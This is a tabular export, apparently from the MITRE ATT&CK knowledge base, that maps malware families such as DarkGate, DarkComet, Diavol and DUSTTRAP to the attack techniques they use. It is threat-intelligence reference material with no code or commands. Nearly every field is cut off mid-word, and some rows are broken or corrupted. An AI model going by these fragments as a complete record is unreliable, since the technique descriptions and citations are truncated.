S0687 Cyclops Blimalware-- software uses T1016 System Netattack-pat technique [Cyclops Bl
S0687 Cyclops Blimalware-- software uses T1070.006Timestompattack-pat technique [Cyclops Bl
S0687 Cyclops Blimalware-- software uses T1071.001Web Protocattack-pat technique [Cyclops Bl
S1033 DCSrv malware--5software uses T1486 Data Encryattack-pat technique [DCSrv](ht
S1033 DCSrv malware--5software uses T1027.013Encrypted/attack-pat technique [DCSrv](htt
S1033 DCSrv malware--5software uses T1036.004Masquerade attack-pat technique [DCSrv](htt
S1033 DCSrv malware--5software uses T1112 Modify Regattack-pat technique [DCSrv](htt
S1033 DCSrv malware--5software uses T1106 Native API attack-pat technique [DCSrv](htt
S1033 DCSrv malware--5software uses T1529 System Sh attack-pat technique [DCSrv](htt
S1033 DCSrv malware--5software uses T1124 System Timattack-pat technique [DCSrv](htt
S1033 DCSrv malware--5software uses T1543.003Windows Se attack-pat technique [DCSrv](htt
S0255 DDKONG malware-- software uses T1140 Deobfuscatattack-pat technique [DDKONG](h
S0255 DDKONG malware-- software uses T1083 File and Di attack-pat technique [DDKONG](ht
S0255 DDKONG malware-- software uses T1105 Ingress Tooattack-pat technique [DDKONG](h
S0255 DDKONG malware-- software uses T1218.011Rundll32 attack-pat technique [DDKONG](ht
S1052 DEADEYE malware-- software uses T1140 Deobfuscatattack-pat technique [DEADEYE](h
S1052 DEADEYE malware-- software uses T1027.009Embeddedattack-pat technique The DEADEYE.EMBED variant
S1052 DEADEYE malware-- software uses T1027.013Encrypted/attack-pat technique [DEADEYE](
S1052 DEADEYE malware-- software uses T1480 Execution attack-pat technique [DEADEYE](
S1052 DEADEYE malware-- software uses T1036.004Masquerade attack-pat technique [DEADEYE](
S1052 DEADEYE malware-- software uses T1218.007Msiexec attack-pat technique [DEADEYE](h
S1052 DEADEYE malware-- software uses T1564.004NTFS File Aattack-pat technique The DEADEYE
S1052 DEADEYE malware-- software uses T1106 Native API attack-pat technique [DEADEYE](
S1052 DEADEYE malware-- software uses T1218.011Rundll32 attack-pat technique [DEADEYE](h
[DEADEYE](https://attack.mit
S1052 DEADEYE malware-- software uses T1053 Scheduled attack-pat technique to establish persistence.(Cita
S1052 DEADEYE malware-- software uses T1082 System Inf attack-pat technique [DEADEYE](
S1052 DEADEYE malware-- software uses T1016 System Netattack-pat technique [DEADEYE](
S1052 DEADEYE malware-- software uses T1059.003Windows Cattack-pat technique [DEADEYE](h
S1134 DEADWOOmalware-- software uses T1531 Account Acattack-pat technique [DEADWOOD]
S1134 DEADWOOmalware-- software uses T1485 Data Destrattack-pat technique [DEADWOOD]
S1134 DEADWOOmalware-- software uses T1140 Deobfuscatattack-pat technique [DEADWOOD]
S1134 DEADWOOmalware-- software uses T1561.001Disk Conteattack-pat technique [DEADWOOD]
S1134 DEADWOOmalware-- software uses T1561.002Disk Struc attack-pat technique [DEADWOOD]
S1134 DEADWOOmalware-- software uses T1027.009Embeddedattack-pat technique [DEADWOOD]
S1134 DEADWOOmalware-- software uses T1027.013Encrypted/attack-pat technique [DEADWOOD]
S1134 DEADWOOmalware-- software uses T1036.004Masquerade attack-pat technique [DEADWOOD]
S1134 DEADWOOmalware-- software uses T1569.002Service Ex attack-pat technique [DEADWOOD]
S1134 DEADWOOmalware-- software uses T1124 System Timattack-pat technique [DEADWOOD](
S0616 DEATHRANmalware-- software uses T1486 Data Encryattack-pat technique [DEATHRANSO
S0616 DEATHRANmalware-- software uses T1083 File and Di attack-pat technique [DEATHRANS
S0616 DEATHRANmalware-- software uses T1105 Ingress Tooattack-pat technique [DEATHRANS
S0616 DEATHRANmalware-- software uses T1490 Inhibit Sy attack-pat technique [DEATHRANS
S0616 DEATHRANmalware-- software uses T1135 Network Shattack-pat technique [DEATHRANS
S0616 DEATHRANmalware-- software uses T1082 System Inf attack-pat technique [DEATHRANS
S0616 DEATHRANmalware-- software uses T1614.001System Lanattack-pat technique Some versi
S0616 DEATHRANmalware-- software uses T1071.001Web Protocattack-pat technique [DEATHRANS
S0616 DEATHRANmalware-- software uses T1047 Windows M attack-pat technique [DEATHRANS
S0213 DOGCALL malware-- software uses T1123 Audio Captattack-pat technique [DOGCALL](
S0213 DOGCALL malware-- software uses T1102.002Bidirectio attack-pat technique [DOGCALL](h
S0213 DOGCALL malware-- software uses T1027.013Encrypted/attack-pat technique [DOGCALL](h
S0213 DOGCALL malware-- software uses T1105 Ingress Tooattack-pat technique [DOGCALL](
S0213 DOGCALL malware-- software uses T1056.001Keyloggingattack-pat technique [DOGCALL](h
S0213 DOGCALL malware-- software uses T1113 Screen Capattack-pat technique [DOGCALL](h
S0694 DRATzarusmalware-- software uses T1005 Data from attack-pat technique [DRATzarus]
S0694 DRATzarusmalware-- software uses T1622 Debugger Eattack-pat technique [DRATzarus]
S0694 DRATzarusmalware-- software uses T1105 Ingress Tooattack-pat technique [DRATzarus]
S0694 DRATzarusmalware-- software uses T1036.005Match Legiattack-pat technique [DRATzarus]
S0694 DRATzarusmalware-- software uses T1106 Native API attack-pat technique [DRATzarus]
S0694 DRATzarusmalware-- software uses T1027 Obfuscatedattack-pat technique [DRATzarus]
S0694 DRATzarusmalware-- software uses T1057 Process Di attack-pat technique [DRATzarus
S0694 DRATzarusmalware-- software uses T1018 Remote Sysattack-pat technique [DRATzarus
S0694 DRATzarusmalware-- software uses T1027.002Software Pattack-pat technique [DRATzarus
S0694 DRATzarusmalware-- software uses T1033 System Own attack-pat technique [DRATzarus]
S0694 DRATzarusmalware-- software uses T1124 System Timattack-pat technique [DRATzarus]
[DRATzarus](https://attack.m
S0694 DRATzarusmalware-- software uses T1497.003Time Basedattack-pat technique detection.(Citation: ClearSky
S0694 DRATzarusmalware-- software uses T1071.001Web Protocattack-pat technique [DRATzarus
S1158 DUSTPAN malware--3software uses T1140 Deobfuscatattack-pat technique [DUSTPAN](
S1158 DUSTPAN malware--3software uses T1027.009Embeddedattack-pat technique [DUSTPAN](
S1158 DUSTPAN malware--3software uses T1027.013Encrypted/attack-pat technique [DUSTPAN](
S1158 DUSTPAN malware--3software uses T1036.005Match Legiattack-pat technique [DUSTPAN](h
S1158 DUSTPAN malware--3software uses T1055.002Portable Exattack-pat technique [DUSTPAN](h
S1158 DUSTPAN malware--3software uses T1543.003Windows Se attack-pat technique [DUSTPAN](
S1159 DUSTTRAPmalware-- software uses T1010 Applicatio attack-pat technique [DUSTTRAP]
S1159 DUSTTRAPmalware-- software uses T1070.001Clear Windattack-pat technique [DUSTTRAP]
S1159 DUSTTRAPmalware-- software uses T1005 Data from attack-pat technique [DUSTTRAP]
S1159 DUSTTRAPmalware-- software uses T1140 Deobfuscatattack-pat technique [DUSTTRAP]
S1159 DUSTTRAPmalware-- software uses T1087.002Domain Acattack-pat technique [DUSTTRAP]
S1159 DUSTTRAPmalware-- software uses T1482 Domain Truattack-pat technique [DUSTTRAP](
S1159 DUSTTRAPmalware-- software uses T1027.009Embeddedattack-pat technique [DUSTTRAP]
S1159 DUSTTRAPmalware-- software uses T1027.013Encrypted/attack-pat technique [DUSTTRAP](
S1159 DUSTTRAPmalware-- software uses T1041 Exfiltratio attack-pat technique [DUSTTRAP](
S1159 DUSTTRAPmalware-- software uses T1083 File and Di attack-pat technique [DUSTTRAP]
S1159 DUSTTRAPmalware-- software uses T1615 Group Poliattack-pat technique [DUSTTRAP]
S1159 DUSTTRAPmalware-- software uses T1070 Indicator attack-pat technique [DUSTTRAP](
S1159 DUSTTRAPmalware-- software uses T1105 Ingress Tooattack-pat technique [DUSTTRAP]
S1159 DUSTTRAPmalware-- software uses T1056.001Keyloggingattack-pat technique [DUSTTRAP]
S1159 DUSTTRAPmalware-- software uses T1087.001Local Acco attack-pat technique [DUSTTRAP]
S1159 DUSTTRAPmalware-- software uses T1654 Log Enumerattack-pat technique [DUSTTRAP]
S1159 DUSTTRAPmalware-- software uses T1070.005Network Shattack-pat technique [DUSTTRAP]
S1159 DUSTTRAPmalware-- software uses T1135 Network Shattack-pat technique [DUSTTRAP]
S1159 DUSTTRAPmalware-- software uses T1057 Process Di attack-pat technique [DUSTTRAP]
S1159 DUSTTRAPmalware-- software uses T1055 Process Injattack-pat technique [DUSTTRAP](
S1159 DUSTTRAPmalware-- software uses T1012 Query Regiattack-pat technique [DUSTTRAP]
S1159 DUSTTRAPmalware-- software uses T1018 Remote Sysattack-pat technique [DUSTTRAP](
S1159 DUSTTRAPmalware-- software uses T1113 Screen Capattack-pat technique [DUSTTRAP]
S1159 DUSTTRAPmalware-- software uses T1518.001Security S attack-pat technique [DUSTTRAP](
S1159 DUSTTRAPmalware-- software uses T1497.001System Cheattack-pat technique [DUSTTRAP]
S1159 DUSTTRAPmalware-- software uses T1082 System Inf attack-pat technique [DUSTTRAP]
S1159 DUSTTRAPmalware-- software uses T1016 System Netattack-pat technique [DUSTTRAP]
S1159 DUSTTRAPmalware-- software uses T1124 System Timattack-pat technique [DUSTTRAP](
S1159 DUSTTRAPmalware-- software uses T1059.003Windows Cattack-pat technique [DUSTTRAP]
S0497 Dacls malware-- software uses T1027.013Encrypted/attack-pat technique [Dacls](htt
S0497 Dacls malware-- software uses T1083 File and Di attack-pat technique [Dacls](ht
S0497 Dacls malware-- software uses T1564.001Hidden Fileattack-pat technique [Dacls](htt
S0497 Dacls malware-- software uses T1105 Ingress Tooattack-pat technique [Dacls](ht
S0497 Dacls malware-- software uses T1543.001Launch Ageattack-pat technique [Dacls](htt
S0497 Dacls malware-- software uses T1543.004Launch Da attack-pat technique [Dacls](ht
S0497 Dacls malware-- software uses T1036 Masqueradattack-pat technique The [Dacls]
S0497 Dacls malware-- software uses T1057 Process Di attack-pat technique [Dacls](htt
S0497 Dacls malware-- software uses T1071.001Web Protocattack-pat technique [Dacls](ht
S1014 DanBot malware-- software uses T1071.004DNS attack-pat technique [DanBot](h
S1014 DanBot malware-- software uses T1005 Data from attack-pat technique [DanBot](h
S1014 DanBot malware-- software uses T1140 Deobfuscatattack-pat technique [DanBot](ht
S1014 DanBot malware-- software uses T1027.013Encrypted/attack-pat technique [DanBot](h
S1014 DanBot malware-- software uses T1070.004File Deleti attack-pat technique [DanBot](ht
S1014 DanBot malware-- software uses T1105 Ingress Tooattack-pat technique [DanBot](ht
S1014 DanBot malware-- software uses T1204.002Malicious Fattack-pat technique [DanBot](ht
S1014 DanBot malware-- software uses T1036.005Match Legiattack-pat technique [DanBot](h
S1014 DanBot malware-- software uses T1053.005Scheduled attack-pat technique [DanBot](ht
S1014 DanBot malware-- software uses T1566.001Spearphishattack-pat technique [DanBot](ht
S1014 DanBot malware-- software uses T1021.005VNC attack-pat technique [DanBot](ht
S1014 DanBot malware-- software uses T1059.005Visual Basiattack-pat technique [DanBot](h
S1014 DanBot malware-- software uses T1071.001Web Protocattack-pat technique [DanBot](h
S1014 DanBot malware-- software uses T1059.003Windows Cattack-pat technique [DanBot](ht
S0334 DarkCometmalware-- software uses T1123 Audio Captattack-pat technique [DarkComet
S0334 DarkCometmalware-- software uses T1115 Clipboard attack-pat technique [DarkComet
S0334 DarkCometmalware-- software uses T1059 Command attack-pat
an technique [DarkComet
S0334 DarkCometmalware-- software uses T1562.004Disable or attack-pat technique [DarkComet
S0334 DarkCometmalware-- software uses T1562.001Disable or attack-pat technique [DarkComet
S0334 DarkCometmalware-- software uses T1105 Ingress Tooattack-pat technique [DarkComet
S0334 DarkCometmalware-- software uses T1056.001Keyloggingattack-pat technique [DarkComet
S0334 DarkCometmalware-- software uses T1036.005Match Legiattack-pat technique [DarkComet
S0334 DarkCometmalware-- software uses T1112 Modify Regattack-pat technique [DarkComet
S0334 DarkCometmalware-- software uses T1057 Process Di attack-pat technique [DarkComet
S0334 DarkCometmalware-- software uses T1547.001Registry Ruattack-pat technique [DarkComet
S0334 DarkCometmalware-- software uses T1021.001Remote Des attack-pat technique [DarkComet
S0334 DarkCometmalware-- software uses T1027.002Software Pattack-pat technique [DarkComet
S0334 DarkCometmalware-- software uses T1082 System Inf attack-pat technique [DarkComet
S0334 DarkCometmalware-- software uses T1033 System Own attack-pat technique [DarkComet
S0334 DarkCometmalware-- software uses T1125 Video Captattack-pat technique [DarkComet
S0334 DarkCometmalware-- software uses T1071.001Web Protocattack-pat technique [DarkComet
S0334 DarkCometmalware-- software uses T1059.003Windows Cattack-pat technique [DarkComet
S1111 DarkGate malware-- software uses T1098.007Additional attack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1010 Applicatio attack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1059.010AutoHotKey attack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1119 Automatedattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1548.002Bypass Useattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1115 Clipboard attack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1496.001Compute Hiattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1555 Credential attack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1574.002DLL Side-L attack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1071.004DNS attack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1486 Data Encryattack-pat technique [DarkGate]
S1111 DarkGate malware-- software uses T1001 Data Obfusattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1622 Debugger Eattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1140 Deobfuscatattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1562.001Disable or attack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1583.001Domains attack-pat technique [DarkGate]
S1111 DarkGate malware-- software uses T1036.007Double Fileattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1027.013Encrypted/attack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1480 Execution attack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1041 Exfiltratio attack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1083 File and Di attack-pat technique Some versio
S1111 DarkGate malware-- software uses T1657 Financial Tattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1564.001Hidden Fileattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1665 Hide Infrasattack-pat technique [DarkGate]
S1111 DarkGate malware-- software uses T1574 Hijack Exe attack-pat technique [DarkGate]
S1111 DarkGate malware-- software uses T1105 Ingress Tooattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1490 Inhibit Sy attack-pat technique [DarkGate]
S1111 DarkGate malware-- software uses T1056.001Keyloggingattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1136.001Local Acco attack-pat technique [DarkGate]
S1111 DarkGate malware-- software uses T1204.002Malicious Fattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1036 Masqueradattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1106 Native API attack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1027 Obfuscatedattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1134.004Parent PIDattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1574.007Path Inter attack-pat technique [DarkGate]
S1111 DarkGate malware-- software uses T1057 Process Di attack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1055.012Process Hoattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1547.001Registry Ruattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1036.003Rename Sys attack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1518.001Security S attack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1569.002Service Ex attack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1566.001Spearphishattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1566.002Spearphishattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1497.001System Cheattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1082 System Inf attack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1614 System Locattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1124 System Timattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1552 Unsecuredattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1059.005Visual Basiattack-pat technique [DarkGate](
S1111 DarkGate malware-- software uses T1059.003Windows Cattack-pat technique [DarkGate](
S1066 DarkTortill malware--5software uses T1574.012COR_PROFIattack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1115 Clipboard attack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1559.001Componentattack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1622 Debugger Eattack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1140 Deobfuscatattack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1055.001Dynamic-linattack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1564 Hide Artifaattack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1105 Ingress Tooattack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1016.001Internet C attack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1056.001Keyloggingattack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1204.002Malicious Fattack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1036 Masqueradattack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1112 Modify Regattack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1106 Native API attack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1027 Obfuscatedattack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1057 Process Di attack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1547.001Registry Ruattack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1518.001Security S attack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1566.001Spearphishattack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1497.001System Cheattack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1082 System Inf attack-pat technique [DarkTorti
S1066 DarkTortill malware--5software uses T1007 System Serattack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1497.003Time Basedattack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1071.001Web Protocattack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1102 Web Servicattack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1059.003Windows Cattack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1047 Windows M attack-pat technique [DarkTortil
S1066 DarkTortill malware--5software uses T1547.004Winlogon Hattack-pat technique [DarkTorti
S0673 DarkWatc malware-- software uses T1010 Applicatio attack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1573.002Asymmetricattack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1217 Browser Inattack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1027.010Command aOttack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1027.004Compile Aftattack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1005 Data from attack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1140 Deobfuscatattack-pat technique [DarkWatchm
S0673 DarkWatc malware-- software uses T1568.002Domain Gen attack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1027.013Encrypted/attack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1070.004File Deleti attack-pat technique [DarkWatchm
S0673 DarkWatc malware-- software uses T1083 File and Di attack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1027.011Fileless St attack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1070 Indicator attack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1490 Inhibit Sy attack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1059.007JavaScript attack-pat technique [DarkWatchm
S0673 DarkWatc malware-- software uses T1056.001Keyloggingattack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1074.001Local Data attack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1036 Masqueradattack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1112 Modify Regattack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1120 Peripheral attack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1059.001PowerShellattack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1012 Query Regiattack-pat technique [DarkWatchm
S0673 DarkWatc malware-- software uses T1053.005Scheduled attack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1518.001Security S attack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1129 Shared Moattack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1566.001Spearphishattack-pat technique [DarkWatchm
S0673 DarkWatc malware-- software uses T1132.001Standard Eattack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1082 System Inf attack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1614 System Locattack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1033 System Own attack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1124 System Timattack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1071.001Web Protocattack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1059.003Windows Cattack-pat technique [DarkWatch
S0673 DarkWatc malware-- software uses T1047 Windows M attack-pat technique [DarkWatch
S0187 Daserf malware--bsoftware uses T1560 Archive Coattack-pat technique [Daserf](ht
S0187 Daserf malware--bsoftware uses T1560.001Archive viaattack-pat technique [Daserf](ht
S0187 Daserf malware--bsoftware uses T1553.002Code Signi attack-pat technique Some [Daser
S0187 Daserf malware--bsoftware uses T1027.005Indicator attack-pat technique Analysis of
S0187 Daserf malware--bsoftware uses T1105 Ingress Tooattack-pat technique [Daserf](h
S0187 Daserf malware--bsoftware uses T1056.001Keyloggingattack-pat technique [Daserf](h
S0187 Daserf malware--bsoftware uses T1003.001LSASS Memattack-pat technique [Daserf](ht
S0187 Daserf malware--bsoftware uses T1036.005Match Legiattack-pat technique [Daserf](ht
S0187 Daserf malware--bsoftware uses T1027 Obfuscatedattack-pat technique [Daserf](ht
S0187 Daserf malware--bsoftware uses T1113 Screen Capattack-pat technique [Daserf](h
S0187 Daserf malware--bsoftware uses T1027.002Software Pattack-pat technique A version o
S0187 Daserf malware--bsoftware uses T1132.001Standard Eattack-pat technique [Daserf](h
S0187 Daserf malware--bsoftware uses T1001.002Steganogr attack-pat technique [Daserf](ht
S0187 Daserf malware--bsoftware uses T1573.001Symmetric attack-pat technique [Daserf](h
S0187 Daserf malware--bsoftware uses T1071.001Web Protocattack-pat technique [Daserf](h
S0187 Daserf malware--bsoftware uses T1059.003Windows Cattack-pat technique [Daserf](h
S0243 DealersChomalware-- software uses T1203 Exploitatioattack-pat technique [DealersCho
S0243 DealersChomalware-- software uses T1071.001Web Protocattack-pat technique [DealersCho
S0243 DealersChomalware-- software uses T1059.003Windows Cattack-pat technique [DealersCho
S0354 Denis malware-- software uses T1560.002Archive viaattack-pat technique [Denis](htt
S0354 Denis malware-- software uses T1027.010Command aOttack-pat technique [Denis](ht
S0354 Denis malware-- software uses T1574.002DLL Side-L attack-pat technique [Denis](htt
S0354 Denis malware-- software uses T1071.004DNS attack-pat technique [Denis](htt
S0354 Denis malware-- software uses T1140 Deobfuscatattack-pat technique [Denis](htt
S0354 Denis malware-- software uses T1070.004File Deleti attack-pat technique [Denis](htt
S0354 Denis malware-- software uses T1083 File and Di attack-pat technique [Denis](htt
S0354 Denis malware-- software uses T1574 Hijack Exe attack-pat technique [Denis](htt
S0354 Denis malware-- software uses T1105 Ingress Tooattack-pat technique [Denis](htt
S0354 Denis malware-- software uses T1106 Native API attack-pat technique [Denis](ht
S0354 Denis malware-- software uses T1027 Obfuscatedattack-pat technique [Denis](htt
S0354 Denis malware-- software uses T1059.001PowerShellattack-pat technique [Denis](htt
S0354 Denis malware-- software uses T1055.012Process Hoattack-pat technique [Denis](ht
S0354 Denis malware-- software uses T1012 Query Regiattack-pat technique [Denis](htt
S0354 Denis malware-- software uses T1132.001Standard Eattack-pat technique [Denis](htt
S0354 Denis malware-- software uses T1497.001System Cheattack-pat technique [Denis](htt
S0354 Denis malware-- software uses T1082 System Inf attack-pat technique [Denis](htt
S0354 Denis malware-- software uses T1016 System Netattack-pat technique [Denis](htt
S0354 Denis malware-- software uses T1033 System Own attack-pat technique [Denis](htt
S0354 Denis malware-- software uses T1059.003Windows Cattack-pat technique [Denis](htt
S0021 Derusbi malware-- software uses T1123 Audio Captattack-pat technique [Derusbi](h
S0021 Derusbi malware-- software uses T1055.001Dynamic-linattack-pat technique [Derusbi](h
S0021 Derusbi malware-- software uses T1008 Fallback C attack-pat technique [Derusbi](
S0021 Derusbi malware-- software uses T1070.004File Deleti attack-pat technique [Derusbi](h
S0021 Derusbi malware-- software uses T1083 File and Di attack-pat technique [Derusbi](h
S0021 Derusbi malware-- software uses T1056.001Keyloggingattack-pat technique [Derusbi](h
S0021 Derusbi malware-- software uses T1095 Non-Applicattack-pat technique [Derusbi](h
S0021 Derusbi malware-- software uses T1571 Non-Standaattack-pat technique [Derusbi](h
S0021 Derusbi malware-- software uses T1057 Process Di attack-pat technique [Derusbi](h
S0021 Derusbi malware-- software uses T1012 Query Regiattack-pat technique [Derusbi](h
S0021 Derusbi malware-- software uses T1218.010Regsvr32 attack-pat technique [Derusbi](h
S0021 Derusbi malware-- software uses T1113 Screen Capattack-pat technique [Derusbi](h
S0021 Derusbi malware-- software uses T1573.001Symmetric attack-pat technique [Derusbi](h
S0021 Derusbi malware-- software uses T1082 System Inf attack-pat technique [Derusbi](h
S0021 Derusbi malware-- software uses T1033 System Own attack-pat technique A Linux ver
S0021 Derusbi malware-- software uses T1070.006Timestompattack-pat technique The [Derusb
S0021 Derusbi malware-- software uses T1059.004Unix Shell attack-pat technique [Derusbi](h
S0021 Derusbi malware-- software uses T1125 Video Captattack-pat technique [Derusbi](h
S0659 Diavol malware-- software uses T1485 Data Destrattack-pat technique [Diavol](ht
S0659 Diavol malware-- software uses T1486 Data Encryattack-pat technique [Diavol](ht
S0659 Diavol malware-- software uses T1562.001Disable or attack-pat technique [Diavol](ht
S0659 Diavol malware-- software uses T1083 File and Di attack-pat technique [Diavol](ht
S0659 Diavol malware-- software uses T1105 Ingress Tooattack-pat technique [Diavol](ht
S0659 Diavol malware-- software uses T1490 Inhibit Sy attack-pat technique [Diavol](ht
S0659 Diavol malware-- software uses T1491.001Internal D attack-pat technique After encr
S0659 Diavol malware-- software uses T1106 Native API attack-pat technique [Diavol](ht
S0659 Diavol malware-- software uses T1135 Network Shattack-pat technique [Diavol](ht
S0659 Diavol malware-- software uses T1027 Obfuscatedattack-pat technique [Diavol](ht
S0659 Diavol malware-- software uses T1057 Process Di attack-pat technique [Diavol](ht
S0659 Diavol malware-- software uses T1018 Remote Sysattack-pat technique [Diavol](ht
S0659 Diavol malware-- software uses T1021.002SMB/Windo attack-pat technique [Diavol](ht
S0659 Diavol malware-- software uses T1489 Service Stoattack-pat technique [Diavol](ht
S0659 Diavol malware-- software uses T1027.003Steganogr attack-pat technique [Diavol](ht
S0659 Diavol malware-- software uses T1082 System Inf attack-pat technique [Diavol](ht
S0659 Diavol malware-- software uses T1016 System Netattack-pat technique [Diavol](ht
S0659 Diavol malware-- software uses T1033 System Own attack-pat technique [Diavol](ht
S0659 Diavol malware-- software uses T1071.001Web Protocattack-pat technique [Diavol](ht
S0200 Dipsind malware-- software uses T1105 Ingress Tooattack-pat technique [Dipsind](h
S0200 Dipsind malware-- software uses T1029 Scheduled attack-pat technique [Dipsind](h
S0200 Dipsind malware-- software uses T1132.001Standard Eattack-pat technique [Dipsind](h
S0200 Dipsind malware-- software uses T1573.001Symmetric attack-pat technique [Dipsind](
S0200 Dipsind malware-- software uses T1071.001Web Protocattack-pat technique [Dipsind](h
S0200 Dipsind malware-- software uses T1059.003Windows Cattack-pat technique [Dipsind](h
S0200 Dipsind malware-- software uses T1547.004Winlogon Hattack-pat technique A [Dipsind]
S1088 Disco malware-- software uses T1659 Content Injattack-pat technique [Disco](htt
S1088 Disco malware-- software uses T1071.002File Transf attack-pat technique [Disco](htt
S1088 Disco malware-- software uses T1105 Ingress Tooattack-pat technique [Disco](ht
S1088 Disco malware-- software uses T1204.002Malicious Fattack-pat technique [Disco](htt
S1088 Disco malware-- software uses T1053.005Scheduled attack-pat technique [Disco](htt
S1021 DnsSystemmalware--8software uses T1071.004DNS attack-pat technique [DnsSystem
S1021 DnsSystemmalware--8software uses T1005 Data from attack-pat technique [DnsSystem]
S1021 DnsSystemmalware--8software uses T1041 Exfiltratio attack-pat technique [DnsSystem]
S1021 DnsSystemmalware--8software uses T1105 Ingress Tooattack-pat technique [DnsSystem
S1021 DnsSystemmalware--8software uses T1204.002Malicious Fattack-pat technique [DnsSystem
S1021 DnsSystemmalware--8software uses T1547.001Registry Ruattack-pat technique [DnsSystem]
S1021 DnsSystemmalware--8software uses T1132.001Standard Eattack-pat technique [DnsSystem
S1021 DnsSystemmalware--8software uses T1033 System Own attack-pat technique [DnsSystem
S1021 DnsSystemmalware--8software uses T1059.003Windows Cattack-pat technique [DnsSystem
S0281 Dok malware-- software uses T1557 Adversary-attack-pat technique [Dok](https
S0281 Dok malware-- software uses T1059.002AppleScripattack-pat technique [Dok](https
S0281 Dok malware-- software uses T1048.003Exfiltrati attack-pat technique [Dok](https
S0281 Dok malware-- software uses T1056.002GUI Input attack-pat technique [Dok](https
S0281 Dok malware-- software uses T1553.004Install Rootattack-pat technique [Dok](https
